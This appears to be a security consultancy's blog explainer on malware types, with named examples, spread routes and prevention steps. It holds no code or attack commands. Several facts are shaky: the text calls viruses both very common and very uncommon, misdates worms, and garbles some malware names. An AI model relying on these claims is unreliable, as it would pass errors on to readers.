Computers are machines driven by specific instruction sets governed by various rules and protocols known as operating systems. Like the human body’s immune system is vulnerable to new viruses and their mutants, computers are prone to malware infections. We cover these basics and the different types of malware and malware attacks in this article.
Malware in electronic devices can result in software vulnerabilities, which may affect legitimate programs in the system. When it does, the result often files damages and loss of essential information in the system.
If your organisation opts for regular penetration tests, you might have read about weaknesses in applications and networks and how these can be exploited by modern computer malware. No matter how good security products your organisation deploys; unless it is a collective approach of people, processes and technology put together, malware infections will be a challenge. To quote the words of the book ‘Information Retrieval’ by Stephen Buttcher, malicious pages deliberately posing as something that they are not in order to attract unwarranted attention of a commercial or other nature is known as spam.
Feel free to watch this video containing a condensed version of the article.
But first, let’s get the basics right.
What is Malware? Malware types and examples
Malware is a contraction for malicious software. Malware means the computer programs or codes deliberately created to cause harm to a computer, network or its users. These programs can perform malicious tasks, such as recording keystrokes, altering programs or settings, theft, stealing, deleting, modifying or encrypting sensitive information and financial information. Therefore, malware refers to malicious code that can cause potential harm to systems or underlying data.
Malware history dates back to 1949 when a mathematician named John Von Neuman proposed a theory. With the dawning of a new century, Malware has continued to evolve with the fast-growing worldwide web offering novel and profitable opportunities to monetise it.
Malware is dynamic in the various ways it attacks a computer, network or server. It is invented to invade a system so that cybercriminals may slip into the network at any convenient time. Malware launches its attack by taking charge of the host system and communicating confidential information, images, and intellectual property back to its original sender.
In the many years that have followed, malware inventors have shown creativity in the various kinds created. This has led to various types of attacks, including disabling victims’ access to data for a ransom and ghost collection of user activity data.
You can make or generate malware by using programming languages and scripting skills such as c/c++, java, python, php, python, etc. You may not realise how simple it is to write malicious programs.
What are the different types of Malware? Examples of malware
The most common types of malware include computer viruses, computer worms, Ransomware, Keyloggers, Trojan horses, spyware and other examples of malicious software. Others include Fileless Malware, Spyware Adware, Rootkits, Bots, RAM scraper, and Mobile Malware. Malicious code examples below show how this code is embedded in various forms of computer programs, mainly:
- ActiveX controls
- Java applets
- Pushed content
- Third-party library components
- Scripting languages
Computer viruses are one of the most common types of malware that, when executed, self-replicate by modifying legitimate programs or host files by inserting their code. When this replication works successfully, it is the program or target file that is infected with computer malware. Think of this as a malicious code example. This makes it tricky because malicious code is run through a legitimate program, and removing that may cause issues around the functioning of the underlying system. Antivirus software or anti-malware software work with this by quarantining, blocking or removing the infected file. Computer viruses are a very uncommon form of malware these days. Not all malware programs are viruses.
A computer worm is a self-replicating malicious program that can spread through a network by cloning itself. Just by simply clicking on a worm-infested email, the infection could spread through an entire company. Computer worms originated in the 1990s by email. History reports that worms arriving as attachments in emails about a decade ago, computer security measures were breached.
Examples of computer worms include Iloveyou worm, SQL, Slammer, Stuxnet. These worms do harmful things like overload phone systems and disrupt television networks. They, unlike viruses, can spread without end-user action. Should you wish to read, we have covered an article on famous computer worms and fun facts.
Ransomware is amongst the most common types of malware attacks these days, where files and users are locked out until a ransom is paid. It is a targeted approach aimed at controlling a target’s computer and locking software and files. The ransom attacker will ask for a payment to get files back and regain access to a computer. Supposedly, once they receive the payment, they will send a unique key to release it.
It is highly encouraged not to pay ransom demands though some businesses, including government organisations, have gone ahead to pay ransoms. Should you pay the ransom? There is no law around this, and it is something you should be thinking about in your security strategy.
Ransomware examples include RYUK, Locky, WannaCry, NotPetya. Ransomware is mostly Trojans, which is propagated through social engineering (phishing, malicious USBs, vishing, etc.). Once ransomware finds its way to the target system, users files are encrypted within a few minutes. However, few malware programs and potentially unwanted applications take a different approach by observing the user for some time (often hours) before commencing users’ encryption.
Ransomware, once executed, can be hard to correct its damage without a robust backup. The best advice is to have a robust offline backup of essential files in a safe hard drive immune to software vulnerabilities. An example includes Robinhood shutting the city of Baltimore government networks, involving crucial activities shutdowns such as tax collection, property transfers, and government emails. These ransomware incident costs have turned into millions of dollars.
Keyloggers are known to monitor user keystrokes. Upon installation, keyloggers can steal sensitive information such as passwords, user IDs, banking details, etc. It is mainly used to steal information and monitor user activity. It can be introduced into a system through social engineering, phishing or malicious downloads from infected websites.
However, media have also highlighted controversial practices used by some employers utilising keyloggers to monitor employee activity. Moreover, keylogger application sellers are finding parents and guardians as their primary customers.
An example keylogger is Olympic Vision (less than 30$ in the market) which was used against targets via Business Email Compromise (BEC) attacks. Using social engineering techniques, this campaign spear-phished specific targets to steal sensitive data.
This leads to the famous question:
Are keyloggers legal at work?
Yes, businesses are used to monitor employee activities, although it is not a widespread practice. On personal computers, keyloggers can be installed only if you are the owner of the computer. It is illegal to use keyloggers for criminal purposes, and you should not use them on systems unauthorised.
A trojan horse disguises itself as legitimate software, tricking users into executing malicious code hidden inside this program. An example of a popular trojan is Emotet. Social engineering propagated Trojan horses via spam emails, and they are now the preferred weapon choice for cybercriminals replacing computer worms.
Email is the most common form of targeting victims. A trojan is either downloaded as an attachment by the unsuspecting user or redirected to the infected websites. The false anti-malware program is the most prevalent type of Trojan.
Another example of Trojans prevalent among cybercriminals is Remote Access Trojans (RAT). A RAT is a malicious program that allows a backdoor connection for its operators. These programs are installed after luring the victim into executing an email attachment or installing a new application or a game. This new program installs and normally works while a backdoor connection provides unauthorised access to its controllers behind the scenes.
Spyware is amongst the malware types that collect user activity and account information without their knowledge. There are different types of Spyware. Their usage is limited to cybercriminals and used by private organisations as these programs are used to keep track of a user, device or computer activities. DarkHotel is an example of spyware that attacked business hotel visitors through hotels’ in-house Wi-Fi networks.
An example here is Internet security essentials that work like rogue antivirus software. It uses scare tactics and fakes the user into believing that it has an association with windows in order to make the user pay for the malware/virus removal. When the computer gets the infection, the user will notice a fake home screen, which is made to look as if it is a window within windows.
Though Spyware may not be as malicious as other malware, the mechanism through which it is executed on a computer is similar to other malware that relies on social engineering-based exploits. An example is Trojan which is also kicked off through social engineering. Users who detect the spyware program’s presence should know there is a weakness in the device that needs to be managed, mostly identified and removed by anti-virus or anti-malware solutions. Spyware vs malware is not a battle, as spyware is just malware designed to collect personal information.
A backdoor is a covert communication channel that bypasses authentication or other main functions of a program. As the name suggests, it is similar to a backdoor of a place that accepts visitors based on who has access to its whereabouts.
Manufacturers have supported backdoors to help customers reset user passwords or firmware upgrades in case of emergency access. However, in general, backdoors are not seen as a friendly software practice due to the secret nature of this program.
Backdoors could be identified or fall into the wrong hands in cyberspace, where cybercriminals can enjoy unfettered access to products. This would allow easy ways to gain access, modify or exfiltrate sensitive data containing PII data.
Examples of some of the most famous backdoors:
- DSL backdoor that was a hardware backdoor by Sercomm on port 32764
- PGP full-disk encryption backdoor
- Backdoors added into pirated copies of WordPress premium plug-ins
- Joomla plug-in backdoor
- Wisely used open-source ProFTPD was backdoored back in 2010
Fileless malware is more of an explanation of how it thrives. Unlike typical malware that invades and infects new systems through files, the fileless malware exploits and thrives using operating system objects (registry keys, scheduled tasks or APIs) or via memory only. This type of malware comprises more than 50% of all malware.
Such APT attacks start by taking advantage of an already existing legitimate program, being launched as a sub-process. Another pathway of attacks can be employing existing legitimate tools integrated into the system’s operating system. Some of the examples of fileless malware are Astaroth, Frodo, The Dark Avenger.
Fileless attacks are more difficult to detect because they easily piggyback on legitimate scripts or are part of scripts that initiate their communication with the server-side endpoint. PowerShell has been particularly popular in fileless attacks due to its ability to run directly from memory.
Adware is an example of malware that makes use of unsolicited advertising techniques. It is represented under different forms of malware though the majority of the adware is non-malicious in nature. Adware programs commonly redirect compromised users’ browser searches to similar web pages containing adverts for other products.
Examples of adware attacks include pop up advertisements of products or ‘free’ version applications packaged with adware. A real-life example of adware is Fireball. It has infected over 250 million computers globally, with its main abilities to run code and download malware and hijacking victims internet traffic to generate advertisement revenue.
Malvertising, or malicious advertising, uses online malicious advertisements to spread malware and compromise systems. Generally, this occurs through the injection of unwanted or malicious code into ads.
Malvertising, or malicious advertising, uses advertisements as the main route to infect systems. It uses legitimate adverts or advert networks to pass on malware to target computers secretly. An example of malvertising is when cybercriminals pay to place an advert on a legitimate website maliciously. Clicking this ad by an unsuspecting user can also lead to the installation of malware on their PC. One of the most popular names is the Angler Exploit Kit.
Other situations occur through drive-by-downloads when malware in an advert executes itself automatically without the user performing any action. Using malvertising has proven lucrative for cybercriminals as they can spread other malware (like ransomware or banking Trojans) to unsuspecting users.
Rootkits are a type of malware that enable unauthorised access to your computer system without being detected. The most distinguishing feature of a rootkit is its ability to run at the Operating System level. This means giving up complete control of the system, i.e. administrative privileges to rootkit handlers (attackers).
Rootkits can spread through different ways, such as malicious downloads, compromised shared devices, malicious attachments and phishing. Rootkits can also be fed into applications, kernels, boot records, virtual machines or firmware. They can serve as a hideout for other malware (like the Keyloggers). An example of Rootkit is Zacinlo which infects systems when users download a fake VPN app without knowing.
Bots/botnets are essentially a combination of Trojans, viruses and worms that perform automated tasks on commands. They can be used for good, such as indexing search engines. Still, when used to propagate malicious intent, they evolve into self-propagating malware with the ability to connect back to a central server.
What type of malware can have multiple control servers distributed all over the world with multiple fallback options?
A botnet is a network of bots used to activate wide floods of attacks such as DDoS attacks remotely controlled. An example of a Botnet is Echobot, a variant of the popular Mirai that exploited insecure IoT devices and other systems into joining an attacker-controlled botnet network used for further large scale network attacks.
Malware affecting mobile devices is as diverse as those targeting computers, including mobile ransomware, spyware, trojans, and madware. Madware is aggressive advertising, targeting smartphones and tablets.
Mobile malware can be distributed and infected in multiple ways, such as phishing, malicious application downloads. Jailbroken phones are increasingly vulnerable to such attacks. These phones lack the default protective features that the original operating system of the device had. An example is Triada, a modular Android mobile trojan that uses root privileges to replace files and change configuration settings.
As the name suggests, RAM scrappers mine temporarily stored data in memory or RAM (Random Access Memory). It targets point-of-sale systems, for example, cash registers. It is because they can, for a short duration, store unencrypted credit card numbers before they encrypt and pass them to the back-end.
What is nagware?
Nagware is a type of software that displays annoying messages to users, typically asking for payment or registration. The name “nagware” is a play on the word “nag”, meaning “to annoy”.
Some nagware is more benign, simply showing reminders or advertisements. More aggressive nagware may disable software features or even prevent it from running altogether.
Nagware is considered a less ethical way of marketing software than shareware, allowing users to try the software before paying for it. However, some argue that nagware is a more honest approach since it doesn’t try to hide the fact that the user will eventually have to pay for the software.
There is a fine line between nagware and malware, as some programs that display nag messages may also install other unwanted software or make changes to the system without the user’s knowledge or consent. For this reason, it’s essential to be careful when downloading and installing any software, even if it’s free.
How do malware attack and spreads?
The following are the most common techniques detailing how malware spreads.
- Vulnerabilities: Malware takes advantage of the weaknesses in a system, network or hardware component to gain access and perform further tasks as per instructions from attackers. Sometimes, initial access gained lacks higher privileges such as administrator or root equivalent access needed to modify programs and settings. A threat actor then utilises privilege escalation attacks such as PowerShell fileless or similar attempts to gain full control.
- Backdoors: A secret entry route to the hardware, software, or networks either left intentionally or unintentionally.
- Drive-by downloads: Malicious downloads and execution without the knowledge of user either by visiting infected websites or executing email attachments
- Flat networks: Organisations with flat network topology without internal firewalling or similar segregations to control traffic flows. Lack of a defence-in-depth approach towards security offers an easier route for malware infections across their network.
- Hybrid threats: Multiple characteristics of common forms of malware are sometimes combined to evade detection mechanisms and maintain a long term foothold on the victim computers.
How to prevent malware attacks?
Based on the infection, it may or may not be wise to identify and prevent malware attacks. In the case of a traditional trojan, virus, worm or similar program, it may not be difficult to find running programs and reversing the processes and events to figure out what happened. However, fileless malware attacks are making it much more difficult to identify attacks.
Preventing the malware attacks requires multiple action items in your list:
- Patch management
- Office macros protection
- Vulnerability management
- Secure configuration baselines
- Secure remote access
- User education
- Multi-factor authentication on external and business-critical assets
- Endpoint protection
- Segregation at user, network and environment levels
- Web and email filtering
- Logging and monitoring controls
- Regular backups and test backup restore
How can Cyphere help you?
Cyphere helps businesses protect their most prized assets from unauthorised access. Cyphere offers technical security assessments, managed services, data privacy and threat intel services. By performing IT health checks, third party validation assessments such as web applications and network penetration tests, businesses can find unknown risks and gaps in their IT security strategies. All deliverables involve thorough reporting of risks and impact, probability and recommendations towards a risk remediation plan.
Get in touch to discuss your security concerns or for a free quote for our services.
Harman Singh is a security professional with over 15 years of consulting experience in both public and private sectors.
As the Managing Consultant at Cyphere, he provides cyber security services to retailers, fintech companies, SaaS providers, housing and social care, construction and more. Harman specialises in technical risk assessments, penetration testing and security strategy.
He regularly speaks at industry events, has been a trainer at prestigious conferences such as Black Hat and shares his expertise on topics such as ‘less is more’ when it comes to cybersecurity. He is a strong advocate for ensuring cyber security as an enabler for business growth.
In addition to his consultancy work, Harman is an active blogger and author who has written articles for Infosecurity Magazine, VentureBeat and other websites.